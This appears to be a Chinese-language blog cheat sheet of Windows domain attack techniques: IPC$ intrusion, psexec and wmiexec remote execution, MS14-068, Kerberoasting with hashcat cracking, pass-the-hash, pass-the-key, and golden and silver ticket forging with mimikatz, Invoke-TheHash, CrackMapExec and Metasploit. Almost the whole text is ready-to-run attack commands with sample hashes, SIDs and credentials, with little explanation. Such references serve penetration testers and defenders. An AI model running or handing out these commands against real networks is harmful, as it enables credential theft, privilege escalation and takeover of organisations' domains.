IPC
IPC$入侵
- 建立非空连接
-
新建批处理
-
Copy命令上传
-
查看目标靶机时间
-
通过at命令在特定时间执行批处理文件
-
在目标靶机上查看
其他命令
-
将目标共享建立一个映射g盘
net use g: \\192.168.3.68\c$
-
查看已建立的会话
通过工具进行会话连接执行
psexec.exe \\192.168.1.108 cmd -uadministrator -p 123456
csript.exe wmiexec.vbs /shell 192.168.1.108 administrator 123456
返回一个cmd交互界面执行即可
MS14068
- 首先尝试访问域控共享文件夹
拒绝访问 -
使用ms16048
-u 域账号[email protected]+域名称
-p 为当前用户的密码,即 ts1 的密码
-s 为 ts1 的 SID 值,可以通过 whoami /all 来获取用户的 SID 值 -d 为当前域的域控
- 生成ccache文件
-
删除当前缓存的kerboeos票据
kerberos::purge
-
导入ccache文件
kerberos::ptc
-
再次访问域控共享文件
Kerberoating
早期kerberoating
工具 Kerberoast工具包 Mimikatz
- 使用Kerberoast工具包GetUserPNs.ps1进行SPN扫描
- 根据微软提供的类KerberosRequeststorSecurityToken发起Kerberos请求申请票据
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SRC_DB_ODAY.org:1433"
-
通过klist命令查看当前会话存储的Kerberos票据
klist
-
使用mimikatz导出
kerberos::list /export
-
使用kerberoast 工具集中的 tgsrepcrack.py 工具进行离线爆破
python tgsrepcrack.py list1.txt [email protected]SSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi
kerberoating新姿势
工具 Invoke-Kerberoast.ps1 HashCat
- 转为Hashcat格式
Invoke-kerberoast –outputformat hashcat | fl
- 保存
nvoke-Kerberoast -Outputformat Hashcat | fl > test1.txt -
Hashcat爆破
hashcat64.exe –m 13100 test1.txt password.list --force
Pth
Pass the hash
- 使用mimikatz先获取hash
privilege::debug
sekurlsa::logonpasswords
- 攻击机执行
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:SRV-DB-0DAY /ntlm:ac307fdeab3e8307c3892c163a7808d5"
- 验证pth
wmiexec
- Invoke-SMBExec
https://github.com/Kevin-Robertson/Invoke-TheHash
Invoke-WMIExec -Target 192.168.3.21 -Domain workgroup -Username administrator -Hash ccef208c6485269c20db2cad21734fe7 -Command "calc.exe" -verbose
- Invoke-SMBExec
Invoke-SMBExec -Target 192.168.3.21 -Domain test.local -Username test1 -Hash ccef208c6485269c20db2cad21734fe7 -Command "calc.exe" -verbose
如果只有SMB文件共享的权限,没有远程执行权限,可以使用该脚本
- wmiexec.py
https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
https://github.com/maaaaz/impacket-examples-windows
wmiexec -hashes 00000000000000000000000000000000:ccef208c6485269c20db2cad21734fe7 workgroup/[email protected] "whoami"
普通用户可用
CrackMapExec
https://github.com/byt3bl33d3r/CrackMapExec.git
crackmapexec 192.168.3.0/24 -u administrator -H ccef208c6485269c20db2cad21734fe7
Ptk
对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012,可以使用AES keys代替NT hash
- 获取用户的aes key
mimikatz "privilege::debug" "sekurlsa::ekeys"
- 注入aes key
mimikatz "privilege::debug" "sekurlsa::pth /user:sqlsvr /domain:0DAY.ORG /aes256:bf2cab4e27a426c9ec9d21c919f119843415ee5d98587063d6e48d16633c5436"
Ptt
Golden ticket(黄金票据)
前提:
域名称
域SID
krbtgt账户密码
伪造用户名
- dump krbtgt hash
privilege::debug
lsadump::lsa /patch
- 生成ticket
kerberos::golden /admin:administrator /domain:0day.org /sid: S-1-5-21-1812960810-2335050734-3517558805 /krbtgt:36f9d9e6d98ecf8307baf4f46ef842a2 /ticket:test.kiribi
- 注入凭据
kerberos::ptt test.kirbi
– 验证Golden ticket
golden ticket(白银票据)
前提:
域名称
域SID
域的服务账户的密码hash
伪造用户名
- dump server hash
privilege::debug
sekurlsa::logonpasswords
- 导入凭证
kerberos::golden /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /target:192.168.3.142 /rc4:74cca677f85c7c566352fd846eb0d82a /service:cifs /user:syst1m /ptt
- 验证
Tips
mimikatz复制粘贴困难,可使用如>>log.txt
exploit/windows/smb/psexec 使用hash传递
post/windows/gather/smart_hashdump 读取hash
.domain_list_gen 获取域管理账户列表
auxiliary/gather/kerberos_enumusers 用户名枚举
auxiliary/admin/kerberos/ms14_068_kerberos_checksum 14068
load kiwi
kerberos_ticket_use /tmp/[email protected] kiwi扩展来导入TGT票证
参考:https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit/
- Mimikatz
load mimikatz 加载
mimikatz_command -f version 版本
mimikatz_command -f fu 获取可用模块列表
msv 检索msv凭证
wdigest 读取密码
kerberos 尝试检索kerberos凭据
看到了再加~
原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er
Y4er 
微信扫一扫 
支付宝扫一扫 
